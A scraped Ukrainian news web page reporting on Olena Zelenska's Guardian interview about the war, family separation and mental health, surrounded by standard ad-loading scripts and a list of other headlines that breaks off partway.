<body><p>Як відомо, для зустрічі з дружиною президента України команда <a href="https://www.theguardian.com/world/2022/jun/18/olena-zelenska-ukraine-first-lady-rare-interview-family-under-threat" rel="nofollow" target="_blank">The Guardian</a> приїхала до Києва. Фотограф та режисер Антуан Д’агата зняв Зеленську у залах Маріїнського палацу, а кореспондент Шон Волкер поспілкувався з нею, розпитавши про війну.</p>
<p class="read-also">І ще: <a href="https://maximum.fm/zhittya-do-vijni-olya-cibulska-pokazala-veseli-tanci-z-mamoyu-na-kuhni_n204715" target="_blank">Життя до війни: Оля Цибульська показала веселі танці з мамою на кухні</a></p>
<div class="news-photo">
<span class="lazyload-holder" style="padding-bottom: 100%;">
<img width="640" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/06/62af15664a080478075196.jpg?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="Олена Зеленська знялася для британського The Guardian - фото 507850">
<noscript>
        <img src="/uploads/media_news/2022/06/62af15664a080478075196.jpg?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="Олена Зеленська знялася для британського The Guardian - фото 507850">
    </noscript>
</span></div>
<p>В інтерв'ю Олена Зеленська розповіла про перші дні російської агресії, свій стан, чоловіка та дітей, а також про те, як український народ переживає поділ сімей: "Половина українців сьогодні живе окремо від своїх сімей. Серед військових випробувань це одне з найважчих".</p>
<p>Перша леді не забула відзначити й важливість турботи про ментальне здоров'я під час війни, що є одним із головних напрямів її роботи. Вона заявила, що українці сьогодні переживають сильне емоційне навантаження.</p>
<p class="quote">Українці не звикли звертатися за допомогою до психологів. Ми схильні ігнорувати депресію чи тривогу. Але тепер нам слід переглянути ці стереотипи. І знадобиться велика інформаційна кампанія, щоб довести людям: це не їхня провина, що їм потрібна психологічна допомога, – додала Олена Зеленська.</p>
<div class="news-photo">
<span class="lazyload-holder" style="padding-bottom: 89.969909729188%;">
<img width="640" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/06/62af156ac890d706917133.png?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="Олена Зеленська знялася для британського The Guardian - фото 507853">
<noscript>
        <img src="/uploads/media_news/2022/06/62af156ac890d706917133.png?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="Олена Зеленська знялася для британського The Guardian - фото 507853">
    </noscript>
</span></div>
<div class="news-photo">
<div class="news-photo">
<span class="lazyload-holder" style="padding-bottom: 96.034297963558%;">
<img width="640" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/06/62af1569c838c259220456.png?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="Олена Зеленська знялася для британського The Guardian - фото 507852">
<noscript>
        <img src="/uploads/media_news/2022/06/62af1569c838c259220456.png?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="Олена Зеленська знялася для британського The Guardian - фото 507852">
    </noscript>
</span></div>
<div class="news-photo">
<div class="news-photo">
<span class="lazyload-holder" style="padding-bottom: 89.850746268657%;">
<img width="640" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/06/62af156bc57bd458720484.png?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="Олена Зеленська знялася для британського The Guardian - фото 507854">
<noscript>
        <img src="/uploads/media_news/2022/06/62af156bc57bd458720484.png?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="Олена Зеленська знялася для британського The Guardian - фото 507854">
    </noscript>
</span></div>
<div class="news-photo">
<div class="news-photo">
<span class="lazyload-holder" style="padding-bottom: 92.857142857143%;">
<img width="640" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/06/62af1568eccf9084520460.png?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="Олена Зеленська знялася для британського The Guardian - фото 507851">
<noscript>
        <img src="/uploads/media_news/2022/06/62af1568eccf9084520460.png?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="Олена Зеленська знялася для британського The Guardian - фото 507851">
    </noscript>
</span></div>
</div>
</div>
</div>
<p class="read-also">Читайте також: <a href="https://maximum.fm/polozhinskij-zapisav-pisnyu-pro-volonteriv-pryamo-na-fronti---video_n204709" target="_blank">Положинський записав пісню про волонтерів прямо на фронті – відео</a></p><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"71e51dc09a455b47","token":"cbfb020a8bb54073809b60aff8bcd962","version":"2022.6.0","si":100}' crossorigin="anonymous"></script>
</body>
<div class="add-scrollNews"></div>
<div class="hide-mobile-adv"></div>
<div class="follow-us-under-news">Читай максимум цікавих новин у
<a href="https://invite.viber.com/?g2=AQAKD4%2BB%2BNY530jWU5ccjyV3AZcJqO4yEMBH%2BHIFofGeS1%2F9tkreWHPw%2BiWAo2Hf&lang=uk" target="_blank">Viber</a>
</div>
<ul class="tags">
<li>Теги:</li>
<li>
<a class="ajaxLink" data-url="/shou-biz_t22786" title="" href="/shou-biz_t22786">Шоу-біз</a>
</li>
<li>
<a class="ajaxLink" data-url="/zirki_t23798" title="" href="/zirki_t23798">Зірки</a>
</li>
<li>
<a class="ajaxLink" data-url="/olena-zelenska_t23892" title="" href="/olena-zelenska_t23892">Олена Зеленська</a>
</li>
</ul>
</div>
</div>
<hr>
<script>
        if (adCore.isSmallerThan(640)) {
            $('.fucked-desktop-adv').remove();
            adCore.defineDfpSlot({
                'name': '/56301415/maximum_promoArticle',
                'sizes': [1, 1],
                'id': 'div-gpt-ad-1513328055277-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function (e) {
                    dfpAdSlots['promoArticle'] = e.slot;
                    if (!e.isEmpty) {
                        document.getElementById('newsListPromoArticle').style.display = 'block';
                    } else {
                        console.log('Empty Promo')
                    }
                }
            });
        }
</script>
<div id="newsListPromoArticle" style="display: none" class="fucked-mobile-adv">
<div id='div-gpt-ad-1513328055277-0'>
 <script type='text/javascript'>
            if (adCore.isSmallerThan(640)) {
                googletag.cmd.push(function () {
                    googletag.display('div-gpt-ad-1513328055277-0');
                });
            }
        </script>
</div>
</div>
<div class="partner-recomendation">
<hr>
<div class="title">
<span class="replace-h3">пропозиції партнерів</span>
</div>
</div>

<script>
    function initPartnerRecommendation (){
        var node = document.createElement("div");
        node.style.textAlign = '-webkit-center';
        node.innerHTML = "<div id='div-gpt-ad-1619016064260-0'></div><div id='div-gpt-ad-1619016119630-0'></div>";
        var summary = document.querySelector(".partner-recomendation");
        summary.after(node);
        var slotId;
        var slotSize;
        var wrapperId;
        if (window.innerWidth < 640) {
            slotId = '/56301415/maximum_mobile_afterNews';
            slotSize = [300, 250];
            wrapperId = 'div-gpt-ad-1619016064260-0';
        } else {
            slotId = '/56301415/maximum_afterNews';
            slotSize = [[1, 1], [600, 300]];
            wrapperId = 'div-gpt-ad-1619016119630-0';
        }
        adCore.defineDfpSlot({
            'name': slotId,
            'sizes': slotSize,
            'id': wrapperId,
            'targeting': [
                ['pageType', adCore.getPageName()],
                                ['newsId', '204720'],
                ['tagId', 'Шоу-біз,Зірки,Олена Зеленська,Фото,Новини'],
                            ],
            'callback': function (e) {
                if(e.isEmpty){
                    console.log('EMPTY DFP afterNews')
                    var dfpDiv = document.getElementById(wrapperId);
                    summary.style.display = 'none';
                    dfpDiv.style.display = 'none';
                }
            }
        });

        var wrapperNode = document.getElementById(wrapperId);
        if (window.innerWidth < 640) {
                googletag.cmd.push(function () {
                    googletag.display(wrapperId);
                });
            wrapperNode.setAttribute('style', 'width: 300px; height: 250px;');
            summary.style.textAlign = '-webkit-center';
        } else {
                googletag.cmd.push(function () {
                    googletag.display(wrapperId);
                });
        }
    }

observer(".follow-us-under-news", initPartnerRecommendation)

</script>

</div>
<div id="load-news-container"></div>
</div>
<div class="columns show-for-large large-4">
<div id="radio24_300x100" style="display: none">
<script>
        if(adCore.isLargerThan(1024)) {
            adCore.defineDfpSlot({
                'name': '/113579682/radio24_300x100',
                'sizes': [300, 100],
                'id': 'div-gpt-ad-1473750613519-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function(e) {
                    if(!e.isEmpty){
                        document.getElementById('radio24_300x100').style.display = 'block';
                    } else {
                        console.log('Empty radio24_300x100')
                    }
                }
            });
        }
</script>
<div class="mobile-300-reklama">
<div id='div-gpt-ad-1473750613519-0'>
<script type='text/javascript'>
                if (adCore.isLargerThan(1024)) {
                    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1473750613519-0'); });
                }
        </script>
</div>
</div> </div>
<script>
        if (adCore.isLargerThan(1024)) {
            $('.fucked-mobile-adv').remove();
            adCore.defineDfpSlot({
                'name': '/56301415/maximum_promoArticle',
                'sizes': [1, 1],
                'id': 'div-gpt-ad-1513328055277-0-1',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function (e) {
                    dfpAdSlots['promoArticle'] = e.slot;
                    if (!e.isEmpty) {
                        document.getElementById('newsListPromoArticle').style.display = 'block';
                    } else {
                        console.log("EMPTY DESKTOP PROMO")
                    }
                }
            });
        }
</script>
<div id="newsListPromoArticle" style="display: none" class="fucked-desktop-adv">
<div id='div-gpt-ad-1513328055277-0-1'>
<script type='text/javascript'>
                if (adCore.isLargerThan(1024)) {
                    googletag.cmd.push(function () {
                        googletag.display('div-gpt-ad-1513328055277-0-1');
                    });
                }
        </script>
</div>
</div>
<div style="margin-top: 20px;" id="radio24_300x250_top">

<div id="M378454ScriptRootC662077">
<div id="M378454PreloadC662077"></div>
<script>
            var D = new Date(), d = document, b = 'body', ce = 'createElement', ac = 'appendChild', st = 'style',
                ds = 'display', n = 'none', gi = 'getElementById', lp = d.location.protocol,
                wp = lp.indexOf('http') == 0 ? lp : 'https:';
            var i = d[ce]('iframe');
            i[st][ds] = n;
            d[gi]("M378454ScriptRootC662077")[ac](i);
            try {
                var iw = i.contentWindow.document;
                iw.open();
                iw.writeln("<ht" + "ml><bo" + "dy></bo" + "dy></ht" + "ml>");
                iw.close();
                var c = iw[b];
            } catch (e) {
                var iw = d;
                var c = d[gi]("M378454ScriptRootC662077");
            }
            var dv = iw[ce]('div');
            dv.id = "MG_ID";
            dv[st][ds] = n;
            dv.innerHTML = 662077;
            c[ac](dv);
            var s = iw[ce]('script');
            s.async = 'async';
            s.defer = 'defer';
            s.charset = 'utf-8';
            s.src = wp + "//jsc.marketgid.com/1/m/1.maximum.fm.662077.js?t=" + D.getYear() + D.getMonth() + D.getUTCDate() + D.getUTCHours();
            c[ac](s);
    </script>
</div>  </div>
<div class="news-list-wrapper" id="news-list-wrapper" data-main="0">
<script data-cfasync="false">
    if (window.innerWidth < 640) {
        const removeElements = (elms) => elms.forEach(el => el.remove());
        removeElements(document.querySelectorAll('.news-list-wrapper'));
    }
</script>
<span class="replace-h3"><a class="ajaxLink" data-url="/novini_t2" title="novina" href="/novini_t2">Новини</a></span>
<ul class="tabs sort-list " data-tabs id="news-list-tabs">
<li data-height-set="false" id="top-list-li" class="tabs-title"><a href="#top-list">Головні</a></li>
<li class="tabs-title is-active"><a href="#last-list" aria-selected="true">Останні</a></li>
</ul>
<div class="tabs-content" data-tabs-content="news-list-tabs">
<div class="tabs-panel is-active" id="last-list">
<button id="last-news-back-less-btn" class="border-button scroll-news-list more-news revers hide-button">Попередні новини
</button>
<div class="last-news-list-wrapper overflow-wrapper">
<ul data-position="0" class="news-list news-list-last-ul" id="ph" style="top:0">

<li data-published-date="2022-06-20 16:49:00" title="" class="   ">
<a target="_self" data-url="/u-lvovi-mozhna-bude-posluhati-vidrazu-kilka-duhovih-orkestriv-ta-dopomogti-zsu_n204734" class="ajaxLink" href="/u-lvovi-mozhna-bude-posluhati-vidrazu-kilka-duhovih-orkestriv-ta-dopomogti-zsu_n204734">
<div class="time">16:49</div>
<div class="news-title">
У Львові можна буде послухати відразу кілька духових оркестрів та допомогти ЗСУ
</div>
</a>
</li>
<li data-published-date="2022-06-20 16:19:00" title="" class="  video  ">
<a target="_self" data-url="/pro-nezlamnist-ukrayinskogo-duhu-ml-tandem-prezentuvali-patriotichnu-robotu-geroyam_n204733" class="ajaxLink" href="/pro-nezlamnist-ukrayinskogo-duhu-ml-tandem-prezentuvali-patriotichnu-robotu-geroyam_n204733">
<div class="time">16:19</div>
<div class="news-title">
Про незламність українського духу: ML Tandem презентували патріотичну роботу &quot;Героям&quot;
</div>
</a>
</li>
<li data-published-date="2022-06-20 15:51:00" title="" class="  with-photo  ">
<a target="_self" data-url="/telegram-zapustiv-platnu-premium-versiyu-svogo-mesendzhera_n204731" class="ajaxLink" href="/telegram-zapustiv-platnu-premium-versiyu-svogo-mesendzhera_n204731">
<div class="time">15:51</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/06/62b0623710b03124788304.jpg?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="У Telegram таки з&#039;явилась платна Premium-версія">
<noscript>
        <img src="/uploads/media_news/2022/06/62b0623710b03124788304.jpg?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="У Telegram таки з&#039;явилась платна Premium-версія">
    </noscript>
</span>
Telegram запустив платну Premium-версію свого месенджера
</div>
</a>
</li>
<li data-published-date="2022-06-20 15:24:00" title="" class="  important  ">
<a target="_self" data-url="/chomu-potribno-chastishe-gulyati-4-vagomi-prichini-pro-yaki-vi-ne-zdogaduvalis_n204732" class="ajaxLink" href="/chomu-potribno-chastishe-gulyati-4-vagomi-prichini-pro-yaki-vi-ne-zdogaduvalis_n204732">
<div class="time">15:24</div>
<div class="news-title">
Чому потрібно частіше гуляти: 4 вагомі причини, про які ви не здогадувались
</div>
</a>
</li>
<li data-published-date="2022-06-20 14:53:00" title="" class="   ">
<a target="_self" data-url="/derzhspeczvyazku-daye-vidpovidi-na-najposhirenishi-zapitannya-ukrayinciv-shchodo-protidiyi-zagrozam_n204730" class="ajaxLink" href="/derzhspeczvyazku-daye-vidpovidi-na-najposhirenishi-zapitannya-ukrayinciv-shchodo-protidiyi-zagrozam_n204730">
<div class="time">14:53</div>
<div class="news-title">
Чи безпечно надавати застосункам доступ на смартфоні: пояснення фахівців
</div>
</a>
</li>
<li data-published-date="" title="" class="with-large-photo  photo video  ">
<a target="_self" data-url="/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167" class="ajaxLink" href="/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167">
<div class="time"></div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="169" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2019/03/5c8a3a3175fc8135803913.png?w=300&amp;h=169&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="З днем народження!">
<noscript>
        <img src="/uploads/media_news/2019/03/5c8a3a3175fc8135803913.png?w=300&amp;h=169&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="З днем народження!">
    </noscript>
</span>
З Днем народження: ТОП 75 привітань у віршах, прозі та смс українською
</div>
</a>
</li>
<li data-published-date="2022-06-20 14:27:48" title="" class="   ">
<a target="_self" data-url="/dzhonni-depp-znovu-opinitsya-u-sudi-hto-ta-u-chomu-zvinuvachuye-aktora_n204729" class="ajaxLink" href="/dzhonni-depp-znovu-opinitsya-u-sudi-hto-ta-u-chomu-zvinuvachuye-aktora_n204729">
<div class="time">14:27</div>
<div class="news-title">
Джонні Депп знову опиниться у суді: хто та у чому звинувачує актора
</div>
</a>
</li>
<li data-published-date="2022-06-20 13:56:24" title="" class="  photo  ">
<a target="_self" data-url="/takij-viglyad-maye-polumyane-vitannya-okupantam-foto-bijciv-59-yi-brigadi_n204728" class="ajaxLink" href="/takij-viglyad-maye-polumyane-vitannya-okupantam-foto-bijciv-59-yi-brigadi_n204728">
<div class="time">13:56</div>
<div class="news-title">
 Такий вигляд має &quot;полум&#039;яне вітання&quot; окупантам: фото бійців 59-ї бригади
</div>
</a>
</li>
<li data-published-date="2022-06-20 13:22:00" title="" class="  important  ">
<a target="_self" data-url="/pogoda-v-ukrayini-21-chervnya-sinoptik-poperedila-pro-doshchi-ta-poholodannya_n204727" class="ajaxLink" href="/pogoda-v-ukrayini-21-chervnya-sinoptik-poperedila-pro-doshchi-ta-poholodannya_n204727">
<div class="time">13:22</div>
<div class="news-title">
Погода в Україні 21 червня: синоптик попередила про дощі та похолодання
</div>
</a>
</li>
<li data-published-date="2022-06-20 12:51:00" title="" class="   ">
<a target="_self" data-url="/spivakiv-vipuskayut-a-inshih--ni-novi-fejki-pro-viyizd-cholovikiv-za-kordon_n204655" class="ajaxLink" href="/spivakiv-vipuskayut-a-inshih--ni-novi-fejki-pro-viyizd-cholovikiv-za-kordon_n204655">
<div class="time">12:51</div>
<div class="news-title">
Співаків випускають, а інших – ні: нові фейки про виїзд чоловіків за кордон
</div>
</a>
</li>
<li data-published-date="2022-06-20 12:22:00" title="" class="  with-photo video  ">
<a target="_self" data-url="/vovk-i-vovkulaki-bijci-pokazali-spokijnu-zustrich-z-hizhim-zvirom--video_n204726" class="ajaxLink" href="/vovk-i-vovkulaki-bijci-pokazali-spokijnu-zustrich-z-hizhim-zvirom--video_n204726">

<div class="time">12:22</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/06/62b0381606e9d049810681.png?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="бійці ССО зустріли вовка">
<noscript>
        <img src="/uploads/media_news/2022/06/62b0381606e9d049810681.png?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="бійці ССО зустріли вовка">
    </noscript>
</span>
Вовк і &quot;вовкулаки&quot;: бійці показали спокійну зустріч з хижим звіром – відео
</div>
</a>
</li>
<li data-published-date="2022-06-20 11:51:00" title="" class="   ">
<a target="_self" data-url="/chomu-obovyazkovo-yisti-vishni-i-chereshni-vidpovid-medikiv_n163391" class="ajaxLink" href="/chomu-obovyazkovo-yisti-vishni-i-chereshni-vidpovid-medikiv_n163391">
<div class="time">11:51</div>
<div class="news-title">
Чому обов&#039;язково їсти вишні і черешні: відповідь медиків
</div>
</a>
</li>
<li data-published-date="2022-06-20 11:26:00" title="" class="  video  ">
<a target="_self" data-url="/dzhej-lo-nazvala-donku-nebinarnoyu-osoboyu-pid-chas-spilnogo-vistupu_n204725" class="ajaxLink" href="/dzhej-lo-nazvala-donku-nebinarnoyu-osoboyu-pid-chas-spilnogo-vistupu_n204725">
<div class="time">11:26</div>
<div class="news-title">
Джей Ло назвала доньку небінарною особою під час спільного виступу
</div>
</a>
</li>

<li data-published-date="2022-06-20 10:53:00" title="" class="  important  ">
<a target="_self" data-url="/u-latviyi-vigotovlyayut-blakitno-zhovte-morozivo-ukrayinci-otrimuyut-jogo-bezplatno_n204724" class="ajaxLink" href="/u-latviyi-vigotovlyayut-blakitno-zhovte-morozivo-ukrayinci-otrimuyut-jogo-bezplatno_n204724">
<div class="time">10:53</div>
<div class="news-title">
У Латвії виготовляють блакитно-жовте морозиво: українці отримають його безплатно
</div>
</a>
</li>
<li data-published-date="" title="" class="with-large-photo  video important  ">
<a target="_self" data-url="/ukrayinska-muzika-2021-roku-rejting-top-50-najkrashchih-pisen-vid-radio-maksimum_n199384" class="ajaxLink" href="/ukrayinska-muzika-2021-roku-rejting-top-50-najkrashchih-pisen-vid-radio-maksimum_n199384">
<div class="time"></div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="169" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2021/12/61bc6728088ae150617869.png?w=300&amp;h=169&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="Найкращі українські пісні 2022 року">
<noscript>
        <img src="/uploads/media_news/2021/12/61bc6728088ae150617869.png?w=300&amp;h=169&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="Найкращі українські пісні 2022 року">
    </noscript>
</span>
Українська музика 2021 року: рейтинг ТОП 50 найкращих пісень від Радіо МАКСИМУМ
</div>
</a>
</li>
<li data-published-date="2022-06-20 10:24:00" title="" class="   ">
<a target="_self" data-url="/tak-roblyat-bilshist-lyudej-mediki-zdivuvali-poradami-pro-smartfoni_n204674" class="ajaxLink" href="/tak-roblyat-bilshist-lyudej-mediki-zdivuvali-poradami-pro-smartfoni_n204674">
<div class="time">10:24</div>
<div class="news-title">
Так роблять більшість людей: медики здивували порадами про смартфони
</div>
</a>
</li>
<li data-published-date="2022-06-20 09:49:00" title="" class="   ">
<a target="_self" data-url="/lito-bez-kondicionera-chotiri-najkrashchih-sposobi-oholoditisya_n195539" class="ajaxLink" href="/lito-bez-kondicionera-chotiri-najkrashchih-sposobi-oholoditisya_n195539">
<div class="time">09:49</div>
<div class="news-title">
Літо без кондиціонера: чотири найкращих способи охолодитися
</div>
</a>
</li>
<li data-published-date="2022-06-20 09:26:00" title="" class="  photo with-photo important  ">
<a target="_self" data-url="/privitannya-z-dnem-angela-bogdana-sms-virshi-proza-ta-kartinki-na-imenini_n180231" class="ajaxLink" href="/privitannya-z-dnem-angela-bogdana-sms-virshi-proza-ta-kartinki-na-imenini_n180231">
<div class="time">09:26</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2020/06/5eed039b11da1989831039.png?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="Бодя, з Днем ангела!">
<noscript>
        <img src="/uploads/media_news/2020/06/5eed039b11da1989831039.png?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="Бодя, з Днем ангела!">
    </noscript>
</span> 
Привітання з Днем ангела Богдана 2022: смс, вірші, проза та картинки на іменини
</div>
</a>
</li>
<li data-published-date="2022-06-20 08:54:00" title="" class="   ">
<a target="_self" data-url="/10-koloritnih-ukrayinskih-sliv-pro-lito-yaki-zbagatyat-vashe-movlennya_n178643" class="ajaxLink" href="/10-koloritnih-ukrayinskih-sliv-pro-lito-yaki-zbagatyat-vashe-movlennya_n178643">
<div class="time">08:54</div>
<div class="news-title">
10 колоритних українських слів про літо, які прикрасять ваше мовлення
</div>
</a>
</li>
<li data-published-date="2022-06-20 08:22:00" title="" class="  photo  ">
<a target="_self" data-url="/bilshe-yisti-fitnes-trenerka-zdivuvala-poradami-yak-pokrashchiti-formu_n201176" class="ajaxLink" href="/bilshe-yisti-fitnes-trenerka-zdivuvala-poradami-yak-pokrashchiti-formu_n201176">
<div class="time">08:22</div>
<div class="news-title">
Більше їсти: фітнес-тренерка здивувала порадами, як покращити форму
</div>
</a>
</li>
<li class="month">
19 червня
</li>
<li data-published-date="2022-06-19 20:52:00" title="" class="  important  ">
<a target="_self" data-url="/20-chervnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti_n204723" class="ajaxLink" href="/20-chervnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti_n204723">
<div class="time">20:52</div>
<div class="news-title">
20 червня 2022 – яке сьогодні свято: традиції, заборони і прикмети
</div>
</a>
</li>
<li data-published-date="2022-06-19 20:20:00" title="" class="   ">
<a target="_self" data-url="/yak-shvidko-zasnuti-v-umovah-postijnoyi-trivogi-aktualni-poradi_n202205" class="ajaxLink" href="/yak-shvidko-zasnuti-v-umovah-postijnoyi-trivogi-aktualni-poradi_n202205">
<div class="time">20:20</div>
<div class="news-title">
Як швидко заснути в умовах постійної тривоги: актуальні поради
</div>
</a>
</li>
<li data-published-date="2022-06-19 19:33:00" title="" class="  video important  ">
<a target="_self" data-url="/zirkovij-kulinar-rozpoviv-yak-po-osoblivomu-zapekti-kartoplyu-pokrokovij-recept-u-video_n204722" class="ajaxLink" href="/zirkovij-kulinar-rozpoviv-yak-po-osoblivomu-zapekti-kartoplyu-pokrokovij-recept-u-video_n204722">
<div class="time">19:33</div>
<div class="news-title">
Зірковий кулінар розповів, як по-особливому запекти картоплю: покроковий рецепт у відео
</div>
</a>
</li>
<li data-published-date="2022-06-19 18:56:00" title="" class="  photo with-photo  ">
<a target="_self" data-url="/yak-pravilno-zamoroziti-hlib-abi-vin-zberigavsya-do-5-misyaciv_n203851" class="ajaxLink" href="/yak-pravilno-zamoroziti-hlib-abi-vin-zberigavsya-do-5-misyaciv_n203851">
<div class="time">18:56</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/05/627794a968b2a385237171.jpg?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=49" data-sizes="auto" class="lazyload " style="" alt="Як зберігати хліб до 5 місяців">
<noscript>
        <img src="/uploads/media_news/2022/05/627794a968b2a385237171.jpg?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=49"  alt="Як зберігати хліб до 5 місяців">
    </noscript>
</span>
Як правильно заморозити хліб, аби він зберігався до 5 місяців
</div>
</a>
</li>
<li data-published-date="2022-06-19 18:28:00" title="" class="  photo last ">
<a target="_self" data-url="/u-microsoft-zaboronili-zavantazhuvati-windows-10-ta-11-na-teritoriyi-rosiyi_n204719" class="ajaxLink" href="/u-microsoft-zaboronili-zavantazhuvati-windows-10-ta-11-na-teritoriyi-rosiyi_n204719">
<div class="time">18:28</div>
<div class="news-title">
У Microsoft заборонили завантажувати Windows 10 та 11 на території Росії
</div>
</a>
</li>
</ul>
</div>
<button data-limit="25" class="border-button scroll-news-list more-news last">Більше новин
</button>
</div>
<div class="tabs-panel" id="top-list">
<button data-scrolled-count="0" data-scrolled-li-index="0" id="important-news-back-less-btn" class="border-button scroll-news-list more-news revers hide-button">Попередні новини
</button>
<div class="important-news-list-wrapper overflow-wrapper">
<ul data-position="0" class="news-list-important-ul news-list" style="top:0">

<li data-published-date="2022-06-20 15:24:00" class="   ">
<a data-url="/chomu-potribno-chastishe-gulyati-4-vagomi-prichini-pro-yaki-vi-ne-zdogaduvalis_n204732" title="" class="ajaxLink" target="_self" href="/chomu-potribno-chastishe-gulyati-4-vagomi-prichini-pro-yaki-vi-ne-zdogaduvalis_n204732">
<div class="time">15:24</div>
<div class="news-title">
Чому потрібно частіше гуляти: 4 вагомі причини, про які ви не здогадувались
</div>
</a>
</li>
<li data-published-date="2022-06-20 13:22:00" class="   ">
<a data-url="/pogoda-v-ukrayini-21-chervnya-sinoptik-poperedila-pro-doshchi-ta-poholodannya_n204727" title="" class="ajaxLink" target="_self" href="/pogoda-v-ukrayini-21-chervnya-sinoptik-poperedila-pro-doshchi-ta-poholodannya_n204727">
<div class="time">13:22</div>
<div class="news-title">
Погода в Україні 21 червня: синоптик попередила про дощі та похолодання
</div>
</a>
</li>
<li data-published-date="2022-06-20 10:53:00" class="   ">
<a data-url="/u-latviyi-vigotovlyayut-blakitno-zhovte-morozivo-ukrayinci-otrimuyut-jogo-bezplatno_n204724" title="" class="ajaxLink" target="_self" href="/u-latviyi-vigotovlyayut-blakitno-zhovte-morozivo-ukrayinci-otrimuyut-jogo-bezplatno_n204724">
<div class="time">10:53</div>
<div class="news-title">
У Латвії виготовляють блакитно-жовте морозиво: українці отримають його безплатно
</div>
</a>
</li>
<li class="month">
19 червня
</li>

<li data-published-date="2022-06-19 19:33:00" class=" video   ">
<a data-url="/zirkovij-kulinar-rozpoviv-yak-po-osoblivomu-zapekti-kartoplyu-pokrokovij-recept-u-video_n204722" title="" class="ajaxLink" target="_self" href="/zirkovij-kulinar-rozpoviv-yak-po-osoblivomu-zapekti-kartoplyu-pokrokovij-recept-u-video_n204722">
<div class="time">19:33</div>
<div class="news-title">
Зірковий кулінар розповів, як по-особливому запекти картоплю: покроковий рецепт у відео
</div>
</a>
</li>
<li data-published-date="2022-06-19 17:19:00" class=" video   ">
<a data-url="/porozhni-plyazhi-ta-zakriti-zakladi-na-foto-pokazali-okupovanu-kirilivku-v-rozpal-sezonu_n204714" title="" class="ajaxLink" target="_self" href="/porozhni-plyazhi-ta-zakriti-zakladi-na-foto-pokazali-okupovanu-kirilivku-v-rozpal-sezonu_n204714">
<div class="time">17:19</div>
<div class="news-title">
Порожні пляжі та закриті заклади: на фото показали окуповану Кирилівку в розпал сезону
</div>
</a>
</li>
<li data-published-date="2022-06-19 14:54:00" class=" video   ">
<a data-url="/sino-zhovti-kostyumi-ta-ruh-na-zahid-u-klipi-pet-shop-boys-1993-roku-viyavili-proroctvo_n204718" title="" class="ajaxLink" target="_self" href="/sino-zhovti-kostyumi-ta-ruh-na-zahid-u-klipi-pet-shop-boys-1993-roku-viyavili-proroctvo_n204718">
<div class="time">14:54</div>
<div class="news-title">
Синьо-жовті костюми та рух на захід: у кліпі Pet Shop Boys 1993 року виявили пророцтво
</div>
</a>
</li>

<li data-published-date="2022-06-19 11:27:00" class=" video   ">
